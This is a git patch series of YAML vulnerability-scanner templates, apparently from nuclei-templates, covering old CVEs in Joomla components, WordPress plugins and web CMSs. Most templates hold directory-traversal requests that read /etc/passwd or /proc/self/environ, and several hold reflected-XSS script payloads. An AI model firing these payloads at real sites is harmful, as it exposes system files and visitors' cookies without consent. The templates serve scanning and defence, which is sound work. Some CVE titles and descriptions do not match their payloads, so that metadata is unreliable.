+id: CVE-2010-4282 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + reference: | + - https://www.exploit-db.com/exploits/15643 + - https://www.cvedetails.com/cve/CVE-2010-4282 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4719.yml b/cves/2010/CVE-2010-4719.yml new file mode 100644 index 0000000000..1d50e72775 --- /dev/null +++ b/cves/2010/CVE-2010-4719.yml @@ -0,0 +1,27 @@ +id: CVE-2010-4719 + +info: + name: Joomla! Component JRadio - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/15749 + - https://www.cvedetails.com/cve/CVE-2010-4719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jradio&controller=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4769.yml b/cves/2010/CVE-2010-4769.yml new file mode 100644 index 0000000000..84aebb4c15 --- /dev/null +++ b/cves/2010/CVE-2010-4769.yml @@ -0,0 +1,27 @@ +id: CVE-2010-4769 + +info: + name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/15585 + - https://www.cvedetails.com/cve/CVE-2010-4769 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4977.yml b/cves/2010/CVE-2010-4977.yml new file mode 100644 index 0000000000..455e53f70c --- /dev/null +++ b/cves/2010/CVE-2010-4977.yml @@ -0,0 +1,27 @@ +id: CVE-2010-4977 + +info: + name: Joomla! Component Canteen 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/34250 + - https://www.cvedetails.com/cve/CVE-2010-4977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-5028.yml b/cves/2010/CVE-2010-5028.yml new file mode 100644 index 0000000000..c5a262e530 --- /dev/null +++ b/cves/2010/CVE-2010-5028.yml @@ -0,0 +1,27 @@ +id: CVE-2010-5028 + +info: + name: Joomla! Component JE Job 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + reference: | + - https://www.exploit-db.com/exploits/12601 + - https://www.cvedetails.com/cve/CVE-2010-5028 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-5286.yml b/cves/2010/CVE-2010-5286.yml new file mode 100644 index 0000000000..9657c736eb --- /dev/null +++ b/cves/2010/CVE-2010-5286.yml @@ -0,0 +1,27 @@ +id: CVE-2010-5286 + +info: + name: Joomla! Component Jstore - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/34837 + - https://www.cvedetails.com/cve/CVE-2010-5286 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2011/CVE-2011-2744.yml b/cves/2011/CVE-2011-2744.yml new file mode 100644 index 0000000000..a31bf3374a --- /dev/null +++ b/cves/2011/CVE-2011-2744.yml @@ -0,0 +1,27 @@ +id: CVE-2011-2744 + +info: + name: Chyrp 2.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + reference: | + - https://www.exploit-db.com/exploits/35945 + - https://www.cvedetails.com/cve/CVE-2011-2744 + tags: cve,cve2011,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0981.yml b/cves/2012/CVE-2012-0981.yml new file mode 100644 index 0000000000..1fbd334ebd --- /dev/null +++ b/cves/2012/CVE-2012-0981.yml @@ -0,0 +1,27 @@ +id: CVE-2012-0981 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/18435 + - https://www.cvedetails.com/cve/CVE-2012-0981 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0996.yml b/cves/2012/CVE-2012-0996.yml new file mode 100644 index 0000000000..2b2b93c82d --- /dev/null +++ b/cves/2012/CVE-2012-0996.yml @@ -0,0 +1,27 @@ +id: CVE-2012-0996 + +info: + name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + reference: | + - https://www.exploit-db.com/exploits/36784 + - https://www.cvedetails.com/cve/CVE-2012-0996 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-1226.yml b/cves/2012/CVE-2012-1226.yml new file mode 100644 index 0000000000..1e6131bf81 --- /dev/null +++ b/cves/2012/CVE-2012-1226.yml @@ -0,0 +1,27 @@ +id: CVE-2012-1226 + +info: + name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + reference: | + - https://www.exploit-db.com/exploits/36873 + - https://www.cvedetails.com/cve/CVE-2012-1226 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-10037.yml b/cves/2014/CVE-2014-10037.yml new file mode 100644 index 0000000000..45138ab312 --- /dev/null +++ b/cves/2014/CVE-2014-10037.yml @@ -0,0 +1,27 @@ +id: CVE-2014-10037 + +info: + name: DomPHP 0.83 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. + reference: | + - https://www.exploit-db.com/exploits/30865 + - https://www.cvedetails.com/cve/CVE-2014-10037 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml new file mode 100644 index 0000000000..a6154b13b5 --- /dev/null +++ b/cves/2014/CVE-2014-4539.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4539 + +info: + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml new file mode 100644 index 0000000000..50c6d4564c --- /dev/null +++ b/cves/2014/CVE-2014-4550.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4550 + +info: + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml new file mode 100644 index 0000000000..745d6d337e --- /dev/null +++ b/cves/2014/CVE-2014-4558.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4558 + +info: + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml new file mode 100644 index 0000000000..81ce56467b --- /dev/null +++ b/cves/2014/CVE-2014-4561.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4561 + +info: + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d + - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml new file mode 100644 index 0000000000..6473d1c69d --- /dev/null +++ b/cves/2014/CVE-2014-4592.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4592 + +info: + name: WP Planet <= 0.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-5111.yml b/cves/2014/CVE-2014-5111.yml new file mode 100644 index 0000000000..f525a4441f --- /dev/null +++ b/cves/2014/CVE-2014-5111.yml @@ -0,0 +1,27 @@ +id: CVE-2014-5111 + +info: + name: Fonality trixbox - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + reference: | + - https://www.exploit-db.com/exploits/39351 + - https://www.cvedetails.com/cve/CVE-2014-5111 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-5258.yml b/cves/2014/CVE-2014-5258.yml new file mode 100644 index 0000000000..3bbaec6a5e --- /dev/null +++ b/cves/2014/CVE-2014-5258.yml @@ -0,0 +1,27 @@ +id: CVE-2014-5258 + +info: + name: webEdition 6.3.8.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/34761 + - https://www.cvedetails.com/cve/CVE-2014-5258 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2015/CVE-2015-4414.yml b/cves/2015/CVE-2015-4414.yml new file mode 100644 index 0000000000..765e2d69dd --- /dev/null +++ b/cves/2015/CVE-2015-4414.yml @@ -0,0 +1,27 @@ +id: CVE-2015-4414 + +info: + name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/37274 + - https://www.cvedetails.com/cve/CVE-2015-4414 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2015/CVE-2015-4632.yml b/cves/2015/CVE-2015-4632.yml new file mode 100644 index 0000000000..9c3123e887 --- /dev/null +++ b/cves/2015/CVE-2015-4632.yml @@ -0,0 +1,27 @@ +id: CVE-2015-4632 + +info: + name: Koha 3.20.1 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + reference: | + - https://www.exploit-db.com/exploits/37388 + - https://www.cvedetails.com/cve/CVE-2015-4632 + tags: cve,cve2015,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file From db0ea5e14cb69ef46f3a12debb54d26884acfdf1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 11:14:32 +0000 Subject: [PATCH 2528/4083] Auto Generated CVE annotations [Mon Sep 27 11:14:32 UTC 2021] :robot: --- cves/2014/CVE-2014-4539.yaml | 6 ++++++ cves/2014/CVE-2014-4550.yaml | 6 ++++++ cves/2014/CVE-2014-4558.yaml | 6 ++++++ cves/2014/CVE-2014-4561.yaml | 6 ++++++ cves/2014/CVE-2014-4592.yaml | 6 ++++++ 5 files changed, 30 insertions(+) diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml index a6154b13b5..e990363423 100644 --- a/cves/2014/CVE-2014-4539.yaml +++ b/cves/2014/CVE-2014-4539.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4539 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml index 50c6d4564c..898d13a6bd 100644 --- a/cves/2014/CVE-2014-4550.yaml +++ b/cves/2014/CVE-2014-4550.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4550 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml index 745d6d337e..38f4f31020 100644 --- a/cves/2014/CVE-2014-4558.yaml +++ b/cves/2014/CVE-2014-4558.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4558 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml index 81ce56467b..257dd609d7 100644 --- a/cves/2014/CVE-2014-4561.yaml +++ b/cves/2014/CVE-2014-4561.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4561 + cwe-id: CWE-79 + description: "The ultimate-weather plugin 1.0 for WordPress has XSS" requests: - method: GET diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml index 6473d1c69d..db868347e2 100644 --- a/cves/2014/CVE-2014-4592.yaml +++ b/cves/2014/CVE-2014-4592.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4592 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter." requests: - method: GET From 22392b0133db7abc696d32813cd475bce6128285 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:07:06 +0530 Subject: [PATCH 2529/4083] Update automation-direct.yaml --- iot/automation-direct.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/iot/automation-direct.yaml b/iot/automation-direct.yaml index 50a972a06e..7e65eca012 100644 --- a/iot/automation-direct.yaml +++ b/iot/automation-direct.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7295 - tags: panel,iot metadata: shodan-dork: http.title:"C-more -- the best HMI presented by AutomationDirect" + google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect" + tags: panel,iot requests: - method: GET @@ -23,3 +24,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '

    ([A-Za-z. 0-9]+)<\/P>' From 9420729c0fb194b8a22778b1586fca63d035bdfa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:09:36 +0530 Subject: [PATCH 2530/4083] Update netsurveillance-web.yaml --- iot/netsurveillance-web.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/iot/netsurveillance-web.yaml b/iot/netsurveillance-web.yaml index 914688bcdd..5f9b318655 100644 --- a/iot/netsurveillance-web.yaml +++ b/iot/netsurveillance-web.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7288 - tags: tech metadata: shodan-dork: http.title:"NETSurveillance WEB" + google-dork: intitle:"NETSurveillance WEB" + tags: tech,iot requests: - method: GET @@ -18,7 +19,7 @@ requests: matchers: - type: word words: - - "NetSuveillanceWebCookie" + - "NetSurveillance WEB" - type: status status: From 40d54d1f3df45a49a50abf8e61c87da7804ecb37 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:13:17 +0530 Subject: [PATCH 2531/4083] Delete new-web-server.yaml --- technologies/new-web-server.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 technologies/new-web-server.yaml diff --git a/technologies/new-web-server.yaml b/technologies/new-web-server.yaml deleted file mode 100644 index d1060d287d..0000000000 --- a/technologies/new-web-server.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: new-web-server - -info: - name: Web Server Detection - author: DhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7291 - tags: tech - metadata: - shodan-dork: html:"Your new web server is ready to use." - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Your new web server is ready to use." - - - type: status - status: - - 200 From 1a2c4d709e30fd6608ef59722ed5348be928ea89 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:17:24 +0530 Subject: [PATCH 2532/4083] Update tileserver-gl.yaml --- technologies/tileserver-gl.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/technologies/tileserver-gl.yaml b/technologies/tileserver-gl.yaml index ce82ed0f7a..934caa93ca 100644 --- a/technologies/tileserver-gl.yaml +++ b/technologies/tileserver-gl.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7296 - tags: tech metadata: shodan-dork: http.title:"TileServer GL - Server for vector and raster maps with GL styles" + google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles" + tags: tech requests: - method: GET @@ -23,3 +24,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Powered by TileServer GL \(([a-z- 0-9.]+)\)' From 79ecbe1323d48d543c90051cb5638b764edb1089 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:59:21 +0530 Subject: [PATCH 2533/4083] Update CVE-2007-4504.yml --- cves/2007/CVE-2007-4504.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2007/CVE-2007-4504.yml b/cves/2007/CVE-2007-4504.yml index 530d923bce..f9e0afd43d 100644 --- a/cves/2007/CVE-2007-4504.yml +++ b/cves/2007/CVE-2007-4504.yml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. - reference: | + reference: - https://www.exploit-db.com/exploits/4307 - https://www.cvedetails.com/cve/CVE-2007-4504 tags: cve,cve2007,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=..|index.php" + - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" matchers-condition: and matchers: @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 479be0665083ac5f92738183a931855836d63184 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 18:00:05 +0530 Subject: [PATCH 2534/4083] Update CVE-2008-4764.yml --- cves/2008/CVE-2008-4764.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2008/CVE-2008-4764.yml b/cves/2008/CVE-2008-4764.yml index 33cee1d111..309174ce27 100644 --- a/cves/2008/CVE-2008-4764.yml +++ b/cves/2008/CVE-2008-4764.yml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. - reference: | + reference: - https://www.exploit-db.com/exploits/5435 - https://www.cvedetails.com/cve/CVE-2008-4764 tags: cve,cve2008,joomla,lfi @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 5c37c65e0f07dd3b0140ee82ec23bc31ee6e44d7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 18:01:15 +0530 Subject: [PATCH 2535/4083] Update CVE-2008-6080.yml --- cves/2008/CVE-2008-6080.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2008/CVE-2008-6080.yml b/cves/2008/CVE-2008-6080.yml index 0fe05fb3b6..d326f80636 100644 --- a/cves/2008/CVE-2008-6080.yml +++ b/cves/2008/CVE-2008-6080.yml @@ -5,10 +5,10 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/6809 - https://www.cvedetails.com/cve/CVE-2008-6080 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2008,joomla,lfi requests: - method: GET @@ -24,4 +24,4 @@ requests: - type: status status: - 